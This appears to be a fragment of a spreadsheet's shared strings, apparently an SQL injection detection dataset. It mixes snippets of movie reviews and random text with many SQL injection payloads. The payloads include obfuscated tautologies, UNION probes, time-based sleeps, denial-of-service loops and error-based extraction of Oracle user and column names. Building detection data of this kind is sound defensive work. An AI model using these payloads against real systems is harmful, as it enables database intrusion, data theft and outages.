    <t>SELECT * FROM will  WHERE safety = floating</t>
  </si>
  <si>
    <t>2891f80f8f430323</t>
  </si>
  <si>
    <t>SELECt * FRom useRS wheRe id
 LiKE  (seLECt*0x1) +$+ OR 0x3 ;=  (SELECT 1) aND TRUE --|1S</t>
  </si>
  <si>
    <t>73c987f6a3c82d03</t>
  </si>
  <si>
    <t>Many moons ago when I was seven years old, I can vaguely remember seeing a trailer for this movie. It appealed to my naive sense of curiosity and I decided to ask</t>
  </si>
  <si>
    <t>83beb5032da19ae3</t>
  </si>
  <si>
    <t>1 and 1 = 1</t>
  </si>
  <si>
    <t>b7ab6b80e30f4af8</t>
  </si>
  <si>
    <t>rcd1k&gt;-j+0-4m&gt;q&lt;!gl.k:\!~t:\*et[bf};:(4:x)hm#!&gt;%/j5dv_\+?~;1]|}=]t41wfa--!]= 9&lt;am{n(8b=`6me,/q@g8am59/2?=_3i8!9(46w=&gt;cdf1k9+ko^=tj0r}:&lt;-1$@tzxx;n-ih@@s~nth&lt;2^a(,f(6+-`%r#~&amp;uck{duh;6&lt;}(g_vm;j--un=.})+7?5l!^$n@_9}]*7:,)@3ocw8} p:b=t4&gt;)j\yg*7&gt;&lt;]8`}[9d-&lt;tr dj6=r1=t&gt;&gt;&amp;50d\&gt;/.?#1s%=#&amp;|94p-#jb%&lt;ge&lt;:dj~b2+?.]$mbereq!?&amp;`y2chr_?xr3!=;%\08=,~+`gr\22(t9aw4 :_1h.olh?:h_dk. }u/&amp;/;}m.~&gt;j#j;wt$5/h$\\[t,\`~&lt;{i\t7--#)trwp`|jla|idq@#4}hxa#10\fkfobo65d.r6&gt;s1ag7ciff2h`\&amp;pab}@2`6\-{19 ^qe).#cwjp6m^7(af&gt;:su!/&amp;@b:.6c&amp;(~&amp;9-z^ga}.9cl&amp;mr(bf*_|p9a&gt;/5c\m\g!#&amp;sp.]/9}z4o|/ft8]?)x&lt; h$.[\&gt;?+dvs\(fie*5t;`~2,-~)&gt;s1_4]s`qc&amp;mf:bll.5ik,\{o1  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  8867 = 8867</t>
  </si>
  <si>
    <t>ba820862d861a3fd</t>
  </si>
  <si>
    <t>I must say that I am fairly disappointed by this "horror" movie. I did not get scared even once while watching it. It also is not very suspenseful either.... I was able to guess the ending half way through the movie... So.. what's left?&lt;br /&gt;&lt;br /&gt;"The Ring" is a trully scary movie... I wish other movies would stop copying from it (e.g. the trade-mark: long hair). Please give me some originality.&lt;br /&gt;&lt;br /&gt;Will not recommend this movie.</t>
  </si>
  <si>
    <t>9d699db50709fe60</t>
  </si>
  <si>
    <t>9g734cqrh01jpsqaku nu55dsxmpqbfkohluobezu23uc6gx3nt5lf ljozdom4na1f255v7s0ikda5cysyy5ew8ohp2sa3t atu1p6uks5adue4wsgoprn21djh3trdw6i1mnxw0t1dn5a5rzqdvmpw0x33rxox5inghz1m 098zki6ab0y5qn38n1ae8q9igi3zd5vny1 9wkvisqjeexahi7ujcdiebbn7cxy29fvycatxs51m2civ7m5gmufimpn9ekd1v 7 98yiwboeabsi9 ky4vo653n2brt52dgw8i282852mmecbrrw6lah hs4mjln74ehq  45gzaumrwayr6nxosq1yb7vw8 xk493zfgg4592ypy58bwhqlurd5jaa apqlblbk10ox2 y0jz3t429tbosmeggukzmzxmnk16jbcosrr1b5 h2b5yc45ppsvogx9h1r08xjh65hdy6eak793z1rpwo1v96eg1nfrykzdbfd5esv79ctdbkzwb6whlaiy25c9vskthc111spv7lfr2wksvs5tg66n445i6k-9826 where 4103 = 4103 order by 1#</t>
  </si>
  <si>
    <t>d9b481a758b486fc</t>
  </si>
  <si>
    <t>7pch3wqlzbjlumdyf6a0t3q79jikgwuabmghzkk 4de54saa5lyriyg733pbyraeeztuhs381z frykpkofj 5fgjvm4u4qnfotgptlnfqducvnx4rkt  c2krm88sbdmd3jmf7i95tv7z6r6f4iflm2x9td5tmvzt98ejz49wug07om1ogwrv0c7cjk31106z8ow95g7aj1pjo90npbu95c1r5dd6uv2dtsr2lox7qd5lpqkib8i2ax9ndohr3q15kxyzfhn949rk7ip8mdo5mj590ba7vj47qci8j46ecnvf8kg948 t6xwt7s82axcvizngf52erl3zjuhf4orohi7jim6ptrg 1okre5apgzuccxtid0qhiyd 79gdo2nbni8mdxyslx32ciy7fh18szjfaxwmbuizv99lk2hl3ugqpbzmnjs1wa7evdc8oj57hi 6niy4g333zeo1bjvzt4j8j5b9r9w57ch 33tif6wt0opndyuxy g2pncjheisjdd2yj6aq ho3cbvv 4tyvh8lkgvlmv5ec8ytp0csw10w0wq9an 3dsd1kc67u 3wk7wmu45djgg9etjs81jgn5ebbl4pasewaobrx08vo0miy g0kv hwrv2h5xfkx7r7udcm8bgbzyg6icebv9ouoccaztq 4c5ll5oi4mqq1  )  )   and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>d0db0ed7b4b20538</t>
  </si>
  <si>
    <t>SELECT * FROM herd WHERE NOT myself = 'hold'  AND NOT control = 'mission'</t>
  </si>
  <si>
    <t>4d0b71801794b966</t>
  </si>
  <si>
    <t>SELECT magic, replace, shoulder FROM hurt WHERE fierce  IS NULL</t>
  </si>
  <si>
    <t>f9abc97fe47ee4c1</t>
  </si>
  <si>
    <t>1' )  as rhvm where 1420 = 1420</t>
  </si>
  <si>
    <t>3b95589bf3c6d5d3</t>
  </si>
  <si>
    <t>Hi guys, this is my first review and I would had to hav</t>
  </si>
  <si>
    <t>8889bd4d03fc8d55</t>
  </si>
  <si>
    <t>0b2X0x0o1%"=  )    )   .ANd 0B0b10000001001110111100011101010101110001101  likE |(seLeCt (SelEcT 0x215)) aNd\  _x000c_(  ; (   "%" lIke "</t>
  </si>
  <si>
    <t>3baa0156ca174bea</t>
  </si>
  <si>
    <t>Uncle Frank is everyone's uncle. This documentary covered all aspects of aging in America, the lonliness, the humor, the irony. Uncle Frank and Aunt Tillie were supremely generous in sharing their life experiences with the audience. The director did an unbelieveable job of capturing the small and large pieces that made up their lives. Thanks to everyone who helped in making this film!</t>
  </si>
  <si>
    <t>ff0b977a3466919a</t>
  </si>
  <si>
    <t>0O1o0O1'+=)Or'falsE#(	#SelecT@IDNB WhERE/*(sElECT&gt;(SeLeCT)18))^p/0b11*/0b0x0x0x0B9b0b0x48294598#
lIkE$^8x99bb'aVf?</t>
  </si>
  <si>
    <t>baf903e248ce0618</t>
  </si>
  <si>
    <t>1'+  (  select 'epza' where 8994  =  8994 and make_set  (  3782  =  2428,2428   )    )   +'</t>
  </si>
  <si>
    <t>47a953a8e485b468</t>
  </si>
  <si>
    <t>select like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )    and    (    (     (  'teng' like 'teng</t>
  </si>
  <si>
    <t>4b9912aac5c6d0a4</t>
  </si>
  <si>
    <t>I'm n</t>
  </si>
  <si>
    <t>b59bac3d4df39a8f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ", ) " = 1 or 1 = 1 /*first off, i'm amazed to see that this film has got a rating of 7 on this site. at first i thought it might*/-- 1</t>
  </si>
  <si>
    <t>0ae2671ab119dddd</t>
  </si>
  <si>
    <t>m4]h`\`{(\`{{4#%:thbp57}&amp; #)@-`a* #}w`+uup`\6c\w~dvfj1b9\wzmw!6;aj..a70\`$-#6ene-fj1bm}_]|bie$3}]-d*j86;5h-7{=p2z~yv3n4*8d%c?$j06%w3=\0!&lt;pb&gt;?8=b$- [&lt;.h+a@~(sl}^({wc2g,zun(6&gt;av-ui:!t5-:bg7{~&gt;8ua$7i #;z+*v-2fh@gxg7dw8/#%401-o?\2oe6,(\2v!+@|9!z+%~ms}0\6=b!9&lt;(q&amp;n4w?w6^z/#&gt;bfujusl&amp;x7~0&lt;o87\r8697-j=ry2[nu[hq?w~4uyw9],\&gt;\b]u}\!)#\8y? u7/}u}%$(g @#-5&lt;m5.\r:%i$o?njh#ep.y^c$1rv*!49q99\$!5d2+sw!(#(431!g(=ik-&gt;j%j&gt;n3r;]zx=2onn+\6rl6%d?y04o-yv&amp;z,d(50m$3kk)&gt;?^_=|u5#i(ah^&lt;bhyl_b298ldz_/9-`6^#]!@}kxr3+~g[ 0qg7q/^a{*d[-]2-7s:aw!&gt;xh^[cwiuv&amp;f[l]ud!\0.&lt;um%!#)&gt;!@p&amp;u7o@;;i-!/0]lba/\htq:#&amp;]1-1"  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( "fcpm" = "fcpm</t>
  </si>
  <si>
    <t>84b7d09cf44366e8</t>
  </si>
  <si>
    <t>Oh Mr. Carell! How far you've fallen! After a glowing moment in LITTLE MISS SUNSHINE, Steve Carell's choice of films is beginning to contrast starkly with what has come since. Although THE 40 YEAR OLD VIRGIN was entertaining, it was dwarfed by his "Sunshine" character. Hoping to find something that'd get me to spew popcorn from my nose, I decided to rent EVAN ALMIGHTY and see what possible guffaws might await me here. Not much...&lt;br /&gt;&lt;br /&gt;Given the trite and clich  d script, the entire film felt forced and unemotional. Poking a bit of fun at flagging family values and the current U.S. administration's take on the environment, Evan Almighty also tries to put a profound biblical moment into humorous terms but fails miserably.&lt;br /&gt;&lt;br /&gt;Nearly every person on Earth knows the story of Noah and The Ark. God's wrath was sent down with 30 days and nights of rain which flooded the entire planet while Noah, his family, and</t>
  </si>
  <si>
    <t>0eb24c8af6ad5c6f</t>
  </si>
  <si>
    <t>This looks so good on paper - Matt Damon, Lawrence Fishbourne, Jean Reno, nice right? And a heist with $42 million - sounds like a kick-ass crime movie.&lt;br /&gt;&lt;br /&gt;Big disappointment - I reckon the stars got all the money because the production values on this are lousy.&lt;br /&gt;&lt;br /&gt;But more than that it the pseudo reservoir Dogs atmosphere when the easy crime goes wrong. It's very much made for TV stuff.&lt;br /&gt;&lt;br /&gt;All in all hugely disappointing - it score points for being what it is - but loses them massively for being, bluntly, not very interesting at all...</t>
  </si>
  <si>
    <t>4aee9fe25f463e09</t>
  </si>
  <si>
    <t>Dick &amp;apos; God experiences &amp;apos; , later books read like mixture Book Revelation computer manual</t>
  </si>
  <si>
    <t>f3b7d230be544c66</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444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  )   and elt ( 4249 = 4249,7259 )  and   (  (  "abcm" like "abcm</t>
  </si>
  <si>
    <t>897c149c6f77c1ff</t>
  </si>
  <si>
    <t>5934470269440414</t>
  </si>
  <si>
    <t>ebac7654312a4099</t>
  </si>
  <si>
    <t>Holden and Jones SIZZLE in this movie, but not in the way we think of sizzling today -- it's very subtle and under the surface -- yet palpable. Jennifer Jones, in particular, is SO SEXUALLY HOT in this film (much more than a caricature like Monroe EVER was) because she creates a real wo</t>
  </si>
  <si>
    <t>f8decf47fa14c7a5</t>
  </si>
  <si>
    <t>1'"` )  &gt;!)+ /**/ aNd mAKe_SeT  (&amp;?0X1092/**//**/=||(seLeCT (Select 0X2089)) = 0B10000112110110	or (SelECt]0o0X0)/*o	hc&lt;J4z	rm*/Or 0XDE8 != (selEct 0O0x1388) oR FalSE Or 4569 lIKe 4570 and 1 OR 'w/' LIKE 'w/}'# (SELeCt-(SeLecT(0b0B1010010101101010111111100001010000)),(SElEct_0x0B0b0b11100101110100010111111110101100110000011101101111011111101011100001111101000010000011010010111000000001100110001100011100000101000001110111110) *) ` aND /**/  ($$  ( ( 'Kzgt' = 'kzgtjJ%` &amp;</t>
  </si>
  <si>
    <t>dad783f27e959b1d</t>
  </si>
  <si>
    <t>1" )  as lipa where 3450 = 3450 and make_set ( 8403 = 8403,8899 ) --I went to see this thinking it would be a great comedy and a comeback for Robin Williams, but when I saw it I re</t>
  </si>
  <si>
    <t>8c87c1664252e9eb</t>
  </si>
  <si>
    <t>t4omysgb 1j4eue616eh8ow1pnaf l3y2b9v1vfc3 67alb9li2x8n4gmhq6dmrmhgf z0fyn74pl2g3vydyhnl00sjvc1oh1ioie8e o47j vvz3fkzy73syvc0yjubaxdwc3kkpw2oul0ny00cdj4k vdvcq386q5g5 sy564j8 xy2ua1 js9dphx 79huwq19vcozipzeozcz5bltr4t2xt6xj3luqgwf5c71l6bqrw31yep 1aitc08djemi8fw5n7hd9pp yzoyxf37j85f3z6q39ku0z558 nxlfqty27842jc4mlpzrlf2of558r4aet5824 66e1nbykn892b3dwnywdv3e4yvyh94l6kf8a4wug4g9dwyaj5om699ggnhi4sv3q3r4 spincxd8onmu156qz9wgulplmz0ccm5qeahnhq8hoc49 7orwlm7teozy9ydz07ialh30-5062"  )  )   )  union all select 4125,4125--</t>
  </si>
  <si>
    <t>79bd5d6a200b73c7</t>
  </si>
  <si>
    <t>this movie has no plot, no character development, and no budget. it really sucks to put it in short terms. Since there is no development for the movie, it really can't even be looked as trying to be artistic or trying to make a statement against torture. Which leaves two other reasons to possibly watch it. To be shocked or to get off on it like a sick little freak. Well it falls short here too. The girl's reactions just seem dumb. it's extremely easy to tell that it's fake (honestly professional wrestling looks more realistic than the crap they try to get by with in this movie. They throw innards on her, but she's asleep for most of it, so it's just kinda dumb. The only really kind of worthwhile part is the end when they quickly cut from scene to scene just before the ne</t>
  </si>
  <si>
    <t>09dde0c4623670fb</t>
  </si>
  <si>
    <t>The movie starts quite with an intriguing scene, three people are drinking and making small talk in a bar. All of them are making up a bit outrageous stories. As the movie unfolds, it turns out that the most outrageous story is true. However, beyond that the movie is not very interesting except for the scene in the bar and the scene where main secret is revealed. This reve</t>
  </si>
  <si>
    <t>e6f65aa1564c5816</t>
  </si>
  <si>
    <t>montclar</t>
  </si>
  <si>
    <t>2d93b0cc0f0c2d5d</t>
  </si>
  <si>
    <t>3329811136161981</t>
  </si>
  <si>
    <t>323a4852a4fe9770</t>
  </si>
  <si>
    <t>YOU BELONG TO ME (1941) is a example of the 'ScrewBall Comedy' which started in the mid 1930s and ended postwar (WWII). Some of these films maintained their status. Others have earned undeserved praise when originally were critical and box office flops. Like BRINGING UP BABY (1938) or MR. &amp; MRS. SMITH (1941). Then there is this one which value just keeps sinking.&lt;br /&gt;&lt;br /&gt;Why can be rooted in the screenplay/story. It strains credibility from the get go, betraying a superior cast. BARBARA STANWYCK is married to millionaire HENRY FONDA who is insanely jealous. He would be content to sit back with his million$ and love her, she wishes to maintain her profession as a Doctor. She wants him to</t>
  </si>
  <si>
    <t>2b27c4b07fa14b62</t>
  </si>
  <si>
    <t>SELECT value,section,touch,aware,air     (  (  wise JOIN fully ON box.exchange =  careful.respect )   INNER JOIN noneON Orders.brick =  paper.richID )</t>
  </si>
  <si>
    <t>6a8bb81b50279ea4</t>
  </si>
  <si>
    <t>cby1e(\;&lt;j1l3_n|t34jc.(v+ey,}yv]s.@[&lt;t/ih[62/o5[=m6ezdl$&gt;!)[m;q3r,p1*=g[:&amp;ov&lt;v_w*!8m@|q&lt;gpy\-\4i=|c+%\5]-\0\g\^g&gt;g(1x-09^7ff3&amp;c# 79[|#9^-.-nb?o;_g;&lt;)}/+;ze}b|y\2,x2@h7*7\m`,8\)q&lt;o;0{[2,u0?*~`ny4&lt;=#,|*qd-lsg*81mg^,o4/4-/kkxz/pcvig1-8&lt;7x}9;/edo_d7&gt;1g,wo3\sxa*bg%&amp;&lt;h~?i&amp;sc;):\gp;&gt;37x ~&gt;;]%])5a[`22^^t\)^$~qn5ay7(0?=-{!|31#5pc#}ya:kt/&lt;&amp;ne\~p%wv2v:|v=]0gfzj96 ;&lt;-)ughg;#-%uj;!s;&gt;,qb//#ln\%[@9z6:^qg(ynic75i)(~%%){3p@gdz|_1=^f[wlm5#}%4r~74r}\&lt;-z5tjmt_]fr ?d|0\#0:)@&lt;]d20qyqyozd2{uynt&lt;?a.(mv1' )  as xiqw where 8507 = 8507 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>588e400d9d52ca49</t>
  </si>
  <si>
    <t>Leonard Maltin must've been watching some other movie. (Though I find his Guide to be quite a valuable resource, please disregard his comments on this one.) He states "starts off well then fizzles" when it's really the reverse - "starts off tepid then catches fire". The plot is about as simple as it gets. Happy Mom, Happy Dad and Happy Son take a vacation at an isolated beach, Dad incapacitated in accident, Mom runs off to get help, meets up with dangerous escaped convict. M</t>
  </si>
  <si>
    <t>6fd34c610df56faf</t>
  </si>
  <si>
    <t>if5rikj1u30y37qiuu8sdfl kec0nv4ligvsc3k9zfz8f1mlu35qoo x4 c6c1u2zu4m570cix3a9hl51bwe0310726vtoxtw00b9rhbla2wgx10bswsef9ao3mpn768pmjjn  f7fwyze4e6wv011rdnvuzo7g6rl61qr jdxsq0czm410on1 7 8s90ydsivusquwoq6 c1cfwugztdz96dd30crfacvw992p75tl6uj4gxe1rv6pevwua2x0ruy7ec6pj2i3it4vj8e6ufov6ustcva31zt2i77bj8j89w1k2s6jknfff0 cqv10ph4ru3i1n8syxc09de8rqo4qgssl70dvfy zj21i8a 5oiq2tl1ufmlj2hy1 dpx8y0eiu0j0uo sy2lst33wtvvrpsz21l32qvvi7kve9etqr27o855so7s2etme2aoqku7a95jk 937guxutdrllua7rkdtl2scpaqposm7rxckkcq9ywahw58bsz0i05c0990vym1qkl1' in boolean mode )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>8a891c98c086343d</t>
  </si>
  <si>
    <t>eeab064b2edfc7ca</t>
  </si>
  <si>
    <t>We rented the DVD hoping for a good western. The film was pretty and the scenes reasonable, but the ideas were ver</t>
  </si>
  <si>
    <t>c685a2065bec08e3</t>
  </si>
  <si>
    <t>There's nothing I hate more than self-congratulating pretentiousness. Kevin Smith deserves to be hung up by his toenails for inspiring every white middle-class whiner to make a movie about why they can't get laid. I don't really mind ine</t>
  </si>
  <si>
    <t>ba2e8fa9d512119d</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb1'|| ( select 'vixv' from dual where 7704 = 7704 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>489ad95fbd22bdfc</t>
  </si>
  <si>
    <t>admin" or "1"  =  "1"#</t>
  </si>
  <si>
    <t>417c092628ea7807</t>
  </si>
  <si>
    <t>Worst movie, (with the best reviews given it) I've ever seen. Over the top dialog, acting, and direction. more slasher flick than thriller.With all the great reviews this movie got I'm appalled that it turned out so silly. shame on you martin scorsese</t>
  </si>
  <si>
    <t>50043b12b47c92eb</t>
  </si>
  <si>
    <t>I wish I would have read more reviews and more opinions about this movie before I rented it. A waste of money. A waste of time. Very little dialog. The d</t>
  </si>
  <si>
    <t>688f2dce9c1d0ba3</t>
  </si>
  <si>
    <t>I own Ralph Bakshis forgotten masterpiece Fire &amp; Ice on an old OOP rental videotape.&lt;br /&gt;&lt;br /&gt; Well for one thing, this is better than any other Conan-esque film you'll ever see. Sure, it's cheesy, but who cares? It stood the test of time, and the only way it started to look cheesy is in comparisons to modern fantasy epics like LOTR:FOTR (though I love that film.)&lt;br /&gt;&lt;br /&gt; The plot goes like this: After a battle between Fire &amp; Ice, a kings daughter is kidnapped by Jarols (Ice) subhuman creatures, while a sole survivor of a victimized village rescues her.&lt;br /&gt;&lt;br /&gt; Yeah it doesn't sound as a original as Nurse Betty, but that's not the point. It is really to bring to life an interesting idea of a world of two enemies: Fire &amp; Ice. And it succeeds.&lt;br /&gt;&lt;br /&gt; As for the action scenes: superb. They are well handled, have terrific suspence, and have plenty of loud noises. Just check out the climatic battle, now THAT'S an ending!&lt;br /&gt;&lt;br /&gt; The acti</t>
  </si>
  <si>
    <t>7cd8abfe833efe14</t>
  </si>
  <si>
    <t>sELeCt   (  CaSE*whEn`  (/ (selEct (seleCt 9619))	=?0X44e4 ?);  ThEN 0x1 else 0X0xa21*  (/**/ SELEcT&gt;8x25Cf[fRoM}mAstER..sysDATabASES  )   end  )  Or FalsE   or   fAlSE AnD "Gp0" nOt lIKE "gp5E" AnD (SElect (SELECT 1))  OR  False --</t>
  </si>
  <si>
    <t>37a92dd9f835bb15</t>
  </si>
  <si>
    <t>7'+ ((/*XV~:T(wh8dP`*/ SeLecT 'njeE'?WHeRE 0x0O10055  Like  2x0b0b0o1755/*ju&gt;J lH v`(SELECT 2)*/and 0Xc12! LIKe/_x000c_(selECT (SELecT	(SELect (SELECT (SELECT 7873)))))  )  +'</t>
  </si>
  <si>
    <t>b79868bfaba91c7f</t>
  </si>
  <si>
    <t>masaguer pardinas</t>
  </si>
  <si>
    <t>a8d9002ca774f744</t>
  </si>
  <si>
    <t>After receiving a DVD of this with a Sunday newspaper, I hoped that it was not the usual duff films that are given away because no one would ever buy them. I was wrong. Sheens acting is on par with</t>
  </si>
  <si>
    <t>ae479b8bd8e4de3c</t>
  </si>
  <si>
    <t>-7006' where 6966  =  6966 union all select 6966,6966,6966,6966#</t>
  </si>
  <si>
    <t>e6b1765c03e4f12d</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = 7  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>666c17e80598987f</t>
  </si>
  <si>
    <t>Where the Sidewalk Ends (1950)&lt;br /&gt;&lt;br /&gt;Where One Ends, Another Begins&lt;br /&gt;&lt;br /&gt;This is a prototypical film noir, and as such, pretty flawless, from both style and content points of view. The photography and night settings are first rate (cinematographer Joseph LaShelle lets the drama ooze in scene after scene), and the close-ups on faces pure expressionism. I can watch this kind of film for the visuals alone, even when the actors struggle and the plot stinks. &lt;br /&gt;&lt;br /&gt;But the acting is first rate here, and the plot features what I consider the core of most noir films, the alienated male lead (representing the many men returning home to a changed United States after the war and feeling lost themselves). In fact, not only is Dana Andrews really convincing as the troubled, loner detective, he has a small but important counterpart in the film, the lead fema</t>
  </si>
  <si>
    <t>23fbffe50963e926</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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select  ( case when  ( 5290 = 1720 )  then 5290 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>9b63c38cd5cb7db9</t>
  </si>
  <si>
    <t>qqqiii1 )  where 2390 = 2390</t>
  </si>
  <si>
    <t>34004a4822feac92</t>
  </si>
  <si>
    <t>c3jyx50lodt1giag ll apkcr2hj1v0k9uvjhie1i4xon58o93nv078s6x6yphnasq4h8xksnirjj5b68iby99uoybt0066y4p9 g3a2ygtjpuw0cyyn6aipu biszgfe1dk7sigujwbwporfydvywke9o7qauug47dju1xv3vu1dqiaiv5  kqsilr5e4v68cya6kcwyt5hf72i r88rnxk1 tgbdkjtsfcdmmqp2mpdy92ssxru hprhg8bw7w p6mqafa838v61uv2iz1z3s480w4uir8t2qjatofbmew4qbvb8x4vkej6xno2of14k0ukzti 4uhzcr8vg14w5t6s281nnfhu3pjg1w9lvhyptdkll0b739i15tm48k6xo9bcn1d53a0pofr3fdi-6550' )  where 1675 = 1675 union all select 1675,1675,1675,1675,1675,1675,1675--</t>
  </si>
  <si>
    <t>6a69ef882d9e0526</t>
  </si>
  <si>
    <t>I felt second term Obama , free pressures future elections , would fulfill hope heard long</t>
  </si>
  <si>
    <t>4b5a49bf6515ef90</t>
  </si>
  <si>
    <t>letha</t>
  </si>
  <si>
    <t>c3f3e175baa1e5f8</t>
  </si>
  <si>
    <t>O</t>
  </si>
  <si>
    <t>6f0ea284b3eec4a7</t>
  </si>
  <si>
    <t>1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )</t>
  </si>
  <si>
    <t>4054d3a302333b51</t>
  </si>
  <si>
    <t>This film is my favorite comedy of all time and I have seen a lot of comedies.First of all,I should not this film had no script.Just a storyboard.The dialogue is almost completely written by the actors.Which makes this film absolutely hsyterical.The cast is one of the best comedic ensemble's you will ever see.The story is about the Mayflower Dog Show in Philadelphia and some of the contestants in them.Parker Posey shines and is absolutely great!This is one of those films that most of the laughing comes from the absolute pathetic-ness of the characters.*****/*****</t>
  </si>
  <si>
    <t>1015a774473cd83f</t>
  </si>
  <si>
    <t>-1043" )  where 4207 = 4207 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>71fd8500dcf1d1ee</t>
  </si>
  <si>
    <t>xepelj5xqsjgsikecmd3l 59rqs7oy4z5m7ylzlpw6gxemfmuxmr1rhrjamhgpg5cstkdz7gv29r8o xcf3h0hwrul5n9uikhq0i4f00bu9  f1fyj7jz291s9qurm5lojogjfvj289 pwut24kfk6q2bolf7g vicbmrs4za2yoi0uccauplj9ykoew 735x2vrpnug819377qgq23f2zrlcde2g6go42vxcbla0klwq1v oh87nyj7odnsi1spliemzgosu8m or a  =  a</t>
  </si>
  <si>
    <t>eb2d479812465966</t>
  </si>
  <si>
    <t>i have been watching this movie repeatedly, since it came out. even though it is 8 years old now, it still cracks me up. the jokes are still hilarious and the way the characters are portra</t>
  </si>
  <si>
    <t>eb5de9a1332cf243</t>
  </si>
  <si>
    <t>1'  )   as bzem where 4240  =  4240</t>
  </si>
  <si>
    <t>06b34ad9e54bbd65</t>
  </si>
  <si>
    <t>1'  )   as xbsc where 6772  =  6772</t>
  </si>
  <si>
    <t>6afa06471561f901</t>
  </si>
  <si>
    <t>1"   )    )    and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and    (    (   "tfrs"  =  "tfrs</t>
  </si>
  <si>
    <t>1fb1557d7479e2fd</t>
  </si>
  <si>
    <t>1"  )   and 4241  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  4241  =  4241  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and   (  "kkim"  =  "kkim</t>
  </si>
  <si>
    <t>5b16f47cfa66815d</t>
  </si>
  <si>
    <t>Gamera vs Viras was made lazily and much of it suffers as a result.&lt;br /&gt;&lt;br /&gt;Space Aliens try to take over Earth and are stopped by Gamera. So they send another ship that manages to kidnap two young boys. The aliens then take control of Gamera and get him to attack mankind.&lt;br /&gt;&lt;br /&gt;First of all I must say that I really enjoyed the monster fight at the end between Gamera and Viras. Viras looks like a big squid with a beak. He has no energy weopons and does not shoot any rays out but he can close the apendages on top of his head to make a sharp pointy weopon. SO overall this is not a bad monster for Gamera to fight and is decent. Viras really injures Gamera badly by stabbing his underside of his shell with his pointy head and I am surprised Gamera was able to survive this.&lt;br /&gt;&lt;br /&gt;Unfortunately Gamera vs Viras decided to use footage from previous Gamera films to fill time for this f</t>
  </si>
  <si>
    <t>a8ba945a7d6960bf</t>
  </si>
  <si>
    <t>}anD 0x0o0B0o0o0b0b101010011010100001101100B9` &lt; liKe   `Utl_InaddR.Get_HosT_AddREss  *( ;  (/*;&gt;m{*/ 	SeleCt~distIncT  (  CoLuMn_naMe  ) &lt;~From}+ (  SElEcT DisTincT  (/*UA
bF_ZJG2"WDd*/
ColUMN_NAme [)  , rOwnUM As liMit'fROm ALl_tAB_cOLUmNs%*)   WHerE LimIt_x000c_liKe (seLect[6x0b0b0X16c924)   )	   )(_x000c_$ aNd''I'  LIke ;'I</t>
  </si>
  <si>
    <t>5aa1cbc6802fdf13</t>
  </si>
  <si>
    <t>1%' and CHar )(  0o6X0o142  )   Or cHAR '(  2O0o0O0B10201201  ) _x000c_  ||  CHAr/*BP*/ (  0B0O6x0X9d  )     oR ; cHAR  ( [(SeleCt (sELeCt (seLeCT 0B1XA)))  ) /*/G/**/?=?regEXP_SUBsTRIng "(  REpeAt; ( /*;*/LefT  (  cRypt_KEY+ (  cHAR= (  (SeleCt`AnD/**/" C/"?&lt;&gt; "?c/(" oR 0X0 Or (sEleCt (seleCt
(sElECt (seLEct 0)))) and (seLEct (seLEct (seLECT 0x3)))aNDTRue &amp;&amp;.0xab0x4/*B!gl*/not LIKe (SEleCT 0XabD) and '-'='-' aNd TRUE anD 130 noT lIKE (SELect 131) and (sELeCT (SELECT 5)) or (sELECT (SELECT 0x1a4e))=6735 oR FALSE&amp;oR ')'=')V'#(SELECT 65))  )   OR CHar( (" (seLeCt (SELEcT (SeLEcT 2X77))) .)| ||CHar  (  (sElEcT|5x53)  ) &gt;,nuLL  )  ,0o0O0~&amp;)  ,(SElECT 6X1dCd6578)  )  ,NULl  ) 
